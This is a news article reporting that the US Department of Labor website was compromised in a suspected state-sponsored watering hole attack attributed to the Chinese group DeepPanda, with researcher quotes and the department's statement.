The US government’s Department of Labor website has been compromised, either by a Chinese hacker known as DeepPanda or an affiliated individual or group, endangering all visitors to the site.
AlienVault Labs uncovered the malicious activity, with director Jaime Blasco telling TechWeekEurope he suspected it was a nation state sponsored attack.
Blasco believes this is a watering hole attack, where attackers infect websites they know their targets visit regularly. US government officials could well be a target, he said, noting how the eventual aim is to get a backdoor on the victims’ machines to execute whatever malicious code they want.
“There are Chinese guys behind this attack,” Blasco said, noting how the attack methods were similar to previous ones on US and non-US organisations. “They are looking for specific victims who are regularly visiting this website from the US government.
“In terms of the kind of attack, and the attacks we have analysed in the past, it is very likely this is state sponsored.
“A lot of people will probably visit that website and they could get infected.”
The infected site was seen serving up a file in JavaScript, before executing a script that that tells the attacker much about protection on victims’ machines, including whether it uses popular antivirus technology.
It will also check what software is running on the system, such as Flash or Java, to check if exploitable versions are resident on the machine.
All that data is sent back to the attacker’s server, which then attempts to exploit a patched vulnerability in Microsoft Internet Explorer, versions 6 through 8.
If the exploit is successful, malware will be downloaded onto the victim’s PC, connecting up to a command and control infrastructure, which AlienLabs believes is used by the Chinese malicious actor DeepPanda.
Only two of the 46 antivirus products tested on Virus Total were able to block the malware.
It is unclear whether the site has been cleansed of the malicious code. The US Department of Labor had not responded to a request for comment at the time of publication.
“We have identified some watering holes in government sites in the past, but this one is very important, as it is one of the main US sites for that branch of the government,” Blasco added.
Various attacks on US organisations have been attributed to China, which has subsequently denied all allegations. Attacks on media organisations, including the New York Times, were linked to the country, as were widespread hits carried out by a group known as APT1.
UPDATE: The US Department of Labor offered the following statement to TechWeek: “On May 1 2013, the Department of Labor (DOL) confirmed that a website related to a DOL program appeared to be compromised. The website was immediately taken offline and the Department began working with appropriate internal and external authorities to investigate and to mitigate any potential impacts.
“The website will remain offline until DOL completes its initial investigation. At this time there is no evidence of compromise to or loss of DOL information nor is there any disruption in DOL’s services. The Department will continue the investigation and will ensure that appropriate precautions and safeguards remain in place to protect our information and information systems.”
What do you know about Internet security? Find out with our quiz!
Suspended prison sentence for Craig Wright for “flagrant breach” of court order, after his false…
Cash-strapped south American country agrees to sell or discontinue its national Bitcoin wallet after signing…
Google's change will allow advertisers to track customers' digital “fingerprints”, but UK data protection watchdog…
Welcome to Silicon In Focus Podcast: Tech in 2025! Join Steven Webb, UK Chief Technology…
European Commission publishes preliminary instructions to Apple on how to open up iOS to rivals,…
San Francisco jury finds Nima Momeni guilty of second-degree murder of Cash App founder Bob…